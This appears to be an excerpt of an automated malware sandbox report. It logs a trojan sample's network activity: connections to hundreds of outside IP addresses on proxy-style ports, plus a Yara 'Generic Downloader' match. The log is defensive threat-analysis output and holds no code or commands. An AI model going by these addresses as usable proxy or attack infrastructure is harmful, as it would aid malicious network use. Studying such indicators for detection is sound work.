                      Source: unknownNetwork traffic detected: HTTP traffic on port 51560 -> 27391
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51489 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 15758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51506
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51562 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51003 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51564 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2019 -> 51326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 8118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 50
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32650 -> 50698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51566 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 33190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50759 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51233 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 59778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51577 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51531 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51551 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51595 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51597 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51129 -> 46164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 37106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 21681
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51572 -> 8123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 42147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51571 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51393
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 51497
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 49382
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 12000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51533
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51677 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51576 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 53281
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51645 -> 8889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51505 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 58977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 15599
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 51538
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51519 -> 23814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51017 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 64052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 51526
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51643 -> 4006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51697 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51683 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51214 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51253 -> 36702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51672 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51722 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51572
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51740 -> 60870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 2020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 56560
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51752 -> 46164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51754 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 10800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51523 -> 48606
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51665 -> 61700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51757 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 30007 -> 51296
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 1081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 11 -> 50564
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51801 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 30026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51732 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 42147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 51227
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 59778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 9090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 9091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51355 -> 25859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 8879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51313 -> 20283
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51505
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51843 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51830 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51845 -> 40280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 4006 -> 51643
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 15777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51420 -> 65100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 15758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51850 -> 56755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 51686
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51856 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51824 -> 8118
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d832d050.0.raw.unpack, type: UNPACKEDPE
                      Source: unknownNetwork traffic detected: IP country count 37
                      Source: global trafficTCP traffic: 192.168.2.8:49710 -> 177.36.13.65:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49711 -> 72.210.208.101:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49712 -> 178.207.11.148:3129
                      Source: global trafficTCP traffic: 192.168.2.8:49713 -> 117.57.93.170:8089
                      Source: global trafficTCP traffic: 192.168.2.8:49714 -> 195.138.73.54:44017
                      Source: global trafficTCP traffic: 192.168.2.8:49716 -> 146.56.101.184:21681
                      Source: global trafficTCP traffic: 192.168.2.8:49717 -> 134.122.43.203:56442
                      Source: global trafficTCP traffic: 192.168.2.8:49719 -> 194.233.78.142:41119
                      Source: global trafficTCP traffic: 192.168.2.8:49720 -> 157.100.6.202:999
                      Source: global trafficTCP traffic: 192.168.2.8:49721 -> 176.236.124.252:10001
                      Source: global trafficTCP traffic: 192.168.2.8:49723 -> 115.96.208.124:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49724 -> 94.40.127.166:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49725 -> 94.153.252.170:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49726 -> 201.77.108.64:999
                      Source: global trafficTCP traffic: 192.168.2.8:49727 -> 103.83.178.42:8181
                      Source: global trafficTCP traffic: 192.168.2.8:49728 -> 187.190.49.166:999
                      Source: global trafficTCP traffic: 192.168.2.8:49729 -> 103.78.25.99:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49730 -> 196.20.125.129:8083
                      Source: global trafficTCP traffic: 192.168.2.8:49731 -> 20.118.133.34:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49732 -> 128.127.94.160:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49733 -> 188.164.196.31:49426
                      Source: global trafficTCP traffic: 192.168.2.8:49734 -> 8.213.129.15:50
                      Source: global trafficTCP traffic: 192.168.2.8:49735 -> 122.52.196.36:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49736 -> 37.32.15.125:6888
                      Source: global trafficTCP traffic: 192.168.2.8:49737 -> 92.246.139.106:11432
                      Source: global trafficTCP traffic: 192.168.2.8:49738 -> 190.109.178.44:999
                      Source: global trafficTCP traffic: 192.168.2.8:49739 -> 137.59.48.20:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49740 -> 79.132.192.13:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49742 -> 91.189.237.78:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49743 -> 82.135.123.155:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49745 -> 202.165.47.90:55443
                      Source: global trafficTCP traffic: 192.168.2.8:49746 -> 104.248.151.220:60915
                      Source: global trafficTCP traffic: 192.168.2.8:49749 -> 188.132.222.7:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49750 -> 88.132.205.84:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49751 -> 148.72.212.212:3786
                      Source: global trafficTCP traffic: 192.168.2.8:49752 -> 202.146.228.254:8088
                      Source: global trafficTCP traffic: 192.168.2.8:49753 -> 167.172.159.43:13988
                      Source: global trafficTCP traffic: 192.168.2.8:49754 -> 46.209.207.150:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49755 -> 203.85.120.69:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49756 -> 198.12.253.1:37106
                      Source: global trafficTCP traffic: 192.168.2.8:49757 -> 72.10.164.178:29075
                      Source: global trafficTCP traffic: 192.168.2.8:49758 -> 196.202.210.73:32650
                      Source: global trafficTCP traffic: 192.168.2.8:49759 -> 128.199.104.190:41354
                      Source: global trafficTCP traffic: 192.168.2.8:49760 -> 81.44.83.70:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49761 -> 68.1.210.189:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49762 -> 51.91.13.215:55637
                      Source: global trafficTCP traffic: 192.168.2.8:49763 -> 47.74.152.29:8888
                      Source: global trafficTCP traffic: 192.168.2.8:49764 -> 134.209.29.120:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49766 -> 5.201.140.196:1080
                      Source: global trafficTCP traffic: 192.168.2.8:49768 -> 178.128.82.105:53299
                      Source: global trafficTCP traffic: 192.168.2.8:49769 -> 189.90.255.208:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49770 -> 84.17.51.235:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49771 -> 103.158.253.187:8090
                      Source: global trafficTCP traffic: 192.168.2.8:49773 -> 200.39.139.65:999
                      Source: global trafficTCP traffic: 192.168.2.8:49774 -> 186.103.130.94:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49775 -> 34.29.41.58:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49776 -> 193.107.104.57:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49777 -> 167.86.69.142:37172
                      Source: global trafficTCP traffic: 192.168.2.8:49778 -> 156.67.172.185:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49782 -> 116.130.233.22:3129
                      Source: global trafficTCP traffic: 192.168.2.8:49783 -> 23.225.72.125:3503
                      Source: global trafficTCP traffic: 192.168.2.8:49784 -> 185.110.190.141:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49785 -> 103.140.35.11:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49787 -> 202.78.160.118:1080
                      Source: global trafficTCP traffic: 192.168.2.8:49788 -> 15.235.187.227:62640
                      Source: global trafficTCP traffic: 192.168.2.8:49789 -> 194.163.129.179:51212
                      Source: global trafficTCP traffic: 192.168.2.8:49790 -> 120.28.139.143:8082
                      Source: global trafficTCP traffic: 192.168.2.8:49791 -> 60.188.102.225:18080
                      Source: global trafficTCP traffic: 192.168.2.8:49794 -> 85.238.74.91:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49796 -> 103.28.86.241:57230
                      Source: global trafficTCP traffic: 192.168.2.8:49797 -> 213.136.78.200:40927
                      Source: global trafficTCP traffic: 192.168.2.8:49798 -> 51.158.105.107:16379
                      Source: global trafficTCP traffic: 192.168.2.8:49799 -> 216.10.242.18:3409
                      Source: global trafficTCP traffic: 192.168.2.8:49800 -> 125.87.86.119:8089
                      Source: global trafficTCP traffic: 192.168.2.8:49802 -> 5.9.98.142:3080
                      Source: global trafficTCP traffic: 192.168.2.8:49803 -> 92.205.105.134:63718
                      Source: global trafficTCP traffic: 192.168.2.8:49804 -> 103.94.133.93:4153
                      Source: global trafficTCP traffic: 192.168.2.8:49806 -> 217.182.153.29:12000
                      Source: global trafficTCP traffic: 192.168.2.8:49808 -> 31.200.242.201:12196
                      Source: global trafficTCP traffic: 192.168.2.8:49809 -> 165.16.27.109:1981
                      Source: global trafficTCP traffic: 192.168.2.8:49810 -> 202.137.144.228:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49811 -> 51.210.45.148:3865
                      Source: global trafficTCP traffic: 192.168.2.8:49812 -> 103.78.54.10:4153
                      Source: global trafficTCP traffic: 192.168.2.8:49813 -> 50.63.12.33:34644
                      Source: global trafficTCP traffic: 192.168.2.8:49814 -> 117.20.56.203:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49815 -> 104.248.158.78:61725
                      Source: global trafficTCP traffic: 192.168.2.8:49817 -> 66.29.128.244:42560
                      Source: global trafficTCP traffic: 192.168.2.8:49818 -> 182.52.83.112:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49819 -> 91.134.140.160:49042
                      Source: global trafficTCP traffic: 192.168.2.8:49820 -> 45.11.95.165:5022
                      Source: global trafficTCP traffic: 192.168.2.8:49821 -> 75.119.145.169:48057
                      Source: global trafficTCP traffic: 192.168.2.8:49822 -> 132.145.61.202:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49823 -> 96.36.50.99:39593
                      Source: global trafficTCP traffic: 192.168.2.8:49824 -> 35.199.90.225:8888
                      Source: global trafficTCP traffic: 192.168.2.8:49825 -> 1.224.3.122:3889
                      Source: global trafficTCP traffic: 192.168.2.8:49826 -> 162.210.192.136:26719
                      Source: global trafficTCP traffic: 192.168.2.8:49827 -> 83.149.249.81:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49829 -> 177.8.170.122:1080
                      Source: global trafficTCP traffic: 192.168.2.8:49830 -> 183.89.14.229:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49831 -> 103.217.249.129:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49832 -> 146.190.84.209:62842
                      Source: global trafficTCP traffic: 192.168.2.8:49833 -> 92.204.136.149:17270
                      Source: global trafficTCP traffic: 192.168.2.8:49834 -> 145.239.2.102:62181
                      Source: global trafficTCP traffic: 192.168.2.8:49835 -> 208.87.131.151:25369
                      Source: global trafficTCP traffic: 192.168.2.8:49836 -> 147.45.40.89:34006
                      Source: global trafficTCP traffic: 192.168.2.8:49837 -> 103.1.50.51:3125
                      Source: global trafficTCP traffic: 192.168.2.8:49838 -> 103.143.8.126:8089
                      Source: global trafficTCP traffic: 192.168.2.8:49839 -> 159.65.217.197:8000
                      Source: global trafficTCP traffic: 192.168.2.8:49841 -> 84.17.35.129:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49842 -> 132.148.129.254:60781
                      Source: global trafficTCP traffic: 192.168.2.8:49843 -> 51.15.125.244:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49844 -> 107.178.9.186:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49846 -> 103.239.253.66:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49845 -> 103.147.246.131:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49847 -> 103.188.168.66:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49851 -> 193.239.86.247:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49852 -> 45.185.236.254:1080
                      Source: global trafficTCP traffic: 192.168.2.8:49853 -> 67.43.227.227:14681
                      Source: global trafficTCP traffic: 192.168.2.8:49854 -> 197.234.13.5:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49855 -> 154.236.179.229:1981
                      Source: global trafficTCP traffic: 192.168.2.8:49861 -> 103.113.71.230:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49863 -> 176.98.81.85:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49867 -> 185.189.199.75:23500
                      Source: global trafficTCP traffic: 192.168.2.8:49868 -> 138.68.60.8:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49869 -> 167.172.109.12:46249
                      Source: global trafficTCP traffic: 192.168.2.8:49872 -> 177.229.210.50:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49873 -> 148.72.23.56:36111
                      Source: global trafficTCP traffic: 192.168.2.8:49875 -> 217.196.21.170:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49877 -> 188.164.193.178:60484
                      Source: global trafficTCP traffic: 192.168.2.8:49878 -> 181.209.82.154:23500
                      Source: global trafficTCP traffic: 192.168.2.8:49879 -> 1.1.104.70:9999
                      Source: global trafficTCP traffic: 192.168.2.8:49881 -> 123.182.58.64:8089
                      Source: global trafficTCP traffic: 192.168.2.8:49882 -> 155.50.208.37:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49883 -> 101.231.64.89:8443
                      Source: global trafficTCP traffic: 192.168.2.8:49884 -> 41.57.25.129:6060
                      Source: global trafficTCP traffic: 192.168.2.8:49885 -> 185.157.47.236:1080
                      Source: global trafficTCP traffic: 192.168.2.8:49887 -> 98.188.47.132:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49888 -> 148.66.130.53:12005
                      Source: global trafficTCP traffic: 192.168.2.8:49889 -> 93.90.212.2:4153
                      Source: global trafficTCP traffic: 192.168.2.8:49890 -> 103.209.68.197:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49891 -> 160.248.184.201:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49896 -> 154.12.253.232:25007
                      Source: global trafficTCP traffic: 192.168.2.8:49897 -> 201.182.251.140:999
                      Source: global trafficTCP traffic: 192.168.2.8:49899 -> 36.95.155.74:3126
                      Source: global trafficTCP traffic: 192.168.2.8:49900 -> 5.183.179.117:45698
                      Source: global trafficTCP traffic: 192.168.2.8:49902 -> 176.37.21.46:41890
                      Source: global trafficTCP traffic: 192.168.2.8:49903 -> 182.23.35.242:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49904 -> 195.30.84.218:34090
                      Source: global trafficTCP traffic: 192.168.2.8:49905 -> 139.5.73.71:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49906 -> 41.217.220.214:32650
                      Source: global trafficTCP traffic: 192.168.2.8:49907 -> 195.34.91.67:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49908 -> 103.13.120.116:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49909 -> 222.241.144.17:2080
                      Source: global trafficTCP traffic: 192.168.2.8:49910 -> 1.2.221.134:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49911 -> 107.180.89.55:12940
                      Source: global trafficTCP traffic: 192.168.2.8:49912 -> 185.18.198.253:14366
                      Source: global trafficTCP traffic: 192.168.2.8:49914 -> 196.3.99.162:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49915 -> 194.44.36.114:6868
                      Source: global trafficTCP traffic: 192.168.2.8:49916 -> 115.144.163.193:11087
                      Source: global trafficTCP traffic: 192.168.2.8:49918 -> 103.121.90.216:15463
                      Source: global trafficTCP traffic: 192.168.2.8:49919 -> 46.182.6.69:41041
                      Source: global trafficTCP traffic: 192.168.2.8:49920 -> 103.169.130.36:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49921 -> 72.10.160.90:19713
                      Source: global trafficTCP traffic: 192.168.2.8:49922 -> 20.219.177.85:3129
                      Source: global trafficTCP traffic: 192.168.2.8:49923 -> 8.213.128.6:8889
                      Source: global trafficTCP traffic: 192.168.2.8:49924 -> 209.145.56.51:6432
                      Source: global trafficTCP traffic: 192.168.2.8:49927 -> 103.153.35.85:3127
                      Source: global trafficTCP traffic: 192.168.2.8:49928 -> 190.112.39.241:5555
                      Source: global trafficTCP traffic: 192.168.2.8:49929 -> 167.99.123.158:27237
                      Source: global trafficTCP traffic: 192.168.2.8:49930 -> 190.57.245.250:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49931 -> 51.158.105.203:16379
                      Source: global trafficTCP traffic: 192.168.2.8:49932 -> 174.75.211.222:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49933 -> 68.183.88.14:7497
                      Source: global trafficTCP traffic: 192.168.2.8:49934 -> 107.180.101.226:51526
                      Source: global trafficTCP traffic: 192.168.2.8:49936 -> 190.69.157.213:999
                      Source: global trafficTCP traffic: 192.168.2.8:49937 -> 200.108.234.105:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49938 -> 79.137.204.161:32381
                      Source: global trafficTCP traffic: 192.168.2.8:49941 -> 174.77.111.196:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49942 -> 99.26.234.177:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49944 -> 154.212.7.243:999
                      Source: global trafficTCP traffic: 192.168.2.8:49945 -> 207.180.236.140:51167
                      Source: global trafficTCP traffic: 192.168.2.8:49946 -> 125.25.40.41:32650
                      Source: global trafficTCP traffic: 192.168.2.8:49948 -> 92.246.139.113:32244
                      Source: global trafficTCP traffic: 192.168.2.8:49949 -> 45.236.36.19:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49950 -> 197.157.254.162:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49951 -> 92.204.135.37:22942
                      Source: global trafficTCP traffic: 192.168.2.8:49953 -> 91.92.80.199:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49954 -> 221.6.139.190:9002
                      Source: global trafficTCP traffic: 192.168.2.8:49957 -> 191.97.19.66:999
                      Source: global trafficTCP traffic: 192.168.2.8:49958 -> 24.192.227.234:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49959 -> 162.240.147.48:51181
                      Source: global trafficTCP traffic: 192.168.2.8:49960 -> 185.104.63.55:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49961 -> 173.212.237.43:44672
                      Source: global trafficTCP traffic: 192.168.2.8:49962 -> 161.97.147.193:15371
                      Source: global trafficTCP traffic: 192.168.2.8:49963 -> 103.178.2.72:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49964 -> 67.43.228.253:7491
                      Source: global trafficTCP traffic: 192.168.2.8:49965 -> 182.160.127.53:48744
                      Source: global trafficTCP traffic: 192.168.2.8:49966 -> 51.178.165.36:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49967 -> 95.158.174.111:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49969 -> 111.16.50.12:9002
                      Source: global trafficTCP traffic: 192.168.2.8:49970 -> 194.150.69.43:8888
                      Source: global trafficTCP traffic: 192.168.2.8:49971 -> 51.38.14.161:23306
                      Source: global trafficTCP traffic: 192.168.2.8:49973 -> 85.235.184.186:3129
                      Source: global trafficTCP traffic: 192.168.2.8:49974 -> 200.229.224.221:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49975 -> 167.249.29.214:999
                      Source: global trafficTCP traffic: 192.168.2.8:49976 -> 117.69.237.183:8089
                      Source: global trafficTCP traffic: 192.168.2.8:49977 -> 220.194.189.144:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49978 -> 51.15.242.202:8888
                      Source: global trafficTCP traffic: 192.168.2.8:49979 -> 93.115.25.139:4635
                      Source: global trafficTCP traffic: 192.168.2.8:49980 -> 178.252.170.222:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49981 -> 212.252.66.209:8080
                      Source: global trafficTCP traffic: 192.168.2.8:49982 -> 12.156.45.155:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49984 -> 178.18.248.104:49153
                      Source: global trafficTCP traffic: 192.168.2.8:49985 -> 109.238.12.156:61743
                      Source: global trafficTCP traffic: 192.168.2.8:49986 -> 72.10.160.170:12899
                      Source: global trafficTCP traffic: 192.168.2.8:49987 -> 18.135.211.182:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49990 -> 139.255.86.226:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49991 -> 177.72.82.9:5678
                      Source: global trafficTCP traffic: 192.168.2.8:49992 -> 103.244.163.197:3128
                      Source: global trafficTCP traffic: 192.168.2.8:49993 -> 185.129.250.183:32284
                      Source: global trafficTCP traffic: 192.168.2.8:49995 -> 61.216.156.222:60808
                      Source: global trafficTCP traffic: 192.168.2.8:49996 -> 212.110.188.202:34409
                      Source: global trafficTCP traffic: 192.168.2.8:49997 -> 107.181.161.81:4145
                      Source: global trafficTCP traffic: 192.168.2.8:49998 -> 131.100.48.105:999
                      Source: global trafficTCP traffic: 192.168.2.8:49999 -> 180.210.222.201:1080
                      Source: global trafficTCP traffic: 192.168.2.8:50001 -> 190.188.244.84:5678
                      Source: global trafficTCP traffic: 192.168.2.8:50002 -> 154.201.62.43:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50003 -> 62.112.10.26:3128
                      Source: global trafficTCP traffic: 192.168.2.8:50004 -> 103.55.33.59:8080
                      Source: global trafficTCP traffic: 192.168.2.8:50006 -> 51.79.87.144:18636
                      Source: global trafficTCP traffic: 192.168.2.8:50007 -> 45.233.3.1:4153
                      Source: global trafficTCP traffic: 192.168.2.8:50008 -> 154.202.114.154:3128
